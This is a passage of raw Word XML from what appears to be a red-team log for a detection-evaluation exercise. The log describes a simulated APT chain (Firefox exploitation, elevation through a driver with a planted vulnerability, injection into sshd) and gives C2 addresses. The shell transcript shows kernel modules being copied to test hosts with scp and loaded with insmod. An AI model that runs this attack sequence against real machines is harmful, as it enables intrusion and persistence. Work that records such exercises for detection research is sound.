    </w:p>
    <w:p w14:paraId="5395201E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>PING www.yale.edu (130.132.51.8) 56(84) bytes of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFDF97D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>vbash-4.1# ping www.nhra.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C58FB0B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>PING www.nhra.com (66.146.2.241) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA3852D" w14:textId="4E4247ED" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_e5gfu4al0rdw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="95" w:name="_Toc12600050"/>
      <w:bookmarkEnd w:id="94"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10:08 -- TA1 TRACE 2 -- Firefox Drakon APT Elevate Inject</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="4838E152" w14:textId="5F033F4B" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Before the attack began, installed the elevate driver and another driver as benign activity.  Exploit Firefox by browsing to the hijacked www.yale.edu.  This resulted in C2 connections to 35.106.122.76:80 and 69.155.209.87:80.  The attacker used elevate to gain root privileges.  The attacker got the processing listing, found the sshd process, and injected into it using a new process injection technique.  This resulted in new C2 connections to aforementioned addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928D5B0" w14:textId="6C4571E0" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_lhacx1l4p4ak" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="97" w:name="_Toc12600051"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="3E9AA50B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-trace-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.118</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Ubuntu 14.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA643F" w14:textId="61A30B4A" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc12600052"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="02A4A925"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Firefox Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F9A545"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Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6145FDB7"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BinFmt-Elevate Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5523486A"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Inject2 Process Injection Technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459DF521" w14:textId="2729F5DB" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_z4p5ey7i49nr" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="100" w:name="_f8jwfnj2pso8" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="101" w:name="_Toc12600053"/>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="57D1DF09" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The elevate driver needed to be loaded on all 3 TRACE machines before we could begin the attack.  We consider this to be part of benign activity.  The malicious use of the simulated vulnerability in the driver is the part of the attack we are interested in being detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520C840E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532EF64" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist$ scp *.ko admin@128.55.12.117:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E16B528" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The authenticity of host '128.55.12.117 (128.55.12.117)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5830939A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ECDSA key fingerprint is 53:4d:e7:24:67:3c:15:7b:55:8b:be:11:89:ad:6e:ce.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B4D24" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EB41E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Warning: Permanently added '128.55.12.117' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664B52D7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.117's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B5F6D7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">load_helper.ko                                                                                                                                      100% 5131     5.0KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CB9628" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">read_scan.ko                                                                                                                                        100% 5045     4.9KB/s   00:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224C66B5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680CEFFD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535FACA1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist$ scp *.ko admin@128.55.12.118:.                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186E6FA9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.118's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBE71B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">load_helper.ko                                                                                                                                      100% 5131     5.0KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281CA88F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">read_scan.ko                                                                                                                                        100% 5045     4.9KB/s   00:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B4931" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB3D570" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300FEE40" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist$ scp *.ko admin@128.55.12.126:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E33C871" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The authenticity of host '128.55.12.126 (128.55.12.126)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D83EC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ECDSA key fingerprint is 4b:40:62:db:c6:af:9f:01:51:ed:e0:6e:14:ed:94:bf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDACBBA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C673FD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Warning: Permanently added '128.55.12.126' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685C8D72" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.126's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AB34C4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">load_helper.ko                                                                                                                                      100% 5131     5.0KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601421B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">read_scan.ko                                                                                                                                        100% 5045     4.9KB/s   00:00  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5D38A5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36531EBC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCED176" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ ssh admin@128.55.12.117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72467A6D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.117's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D38A48" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126CA82D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7C8CC7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Documentation:  https://help.ubuntu.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31A49A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3184A0F5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System information as of Tue May 14 10:07:41 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481F97E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F12EB34" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System load: 3.07               Memory usage: 64%   Processes:       263</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D620E1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Usage of /:  6.1% of 885.13GB   Swap usage:   2%    Users logged in: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B81C4D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A22712A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Graph this data and manage this system at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C4521" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    https://landscape.canonical.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD4D9E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB867BB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>174 packages can be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79705197" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>130 updates are security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F6F3FB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FAD433" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Your Hardware Enablement Stack (HWE) is supported until April 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB9792" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Last login: Tue May 14 10:05:34 2019 from 128.55.12.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE29D60" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26BC1D7B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:~$ sudo insmod read_scan.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C3B49A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[sudo] password for admin: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F44546" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta1-trace-1:~$ sudo insmod load_helper.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D12534A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:~$ lsmod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531214F3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module                  Size  Used by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BA8AA9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">load_helper            16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A66742C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">read_scan              16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5783A2B6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">netio_controller       16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7005FB14" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">glx_alsa_675           16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307E1BBD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FAE3AB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FD184C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F99FB24" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ ssh admin@128.55.12.118</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5144849F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.118's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA09B02" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Permission denied, please try again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48676DFF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.118's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F3BA69" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4321C4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79732AF3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Documentation:  https://help.ubuntu.com/</w:t>
      </w:r>
    </w:p>
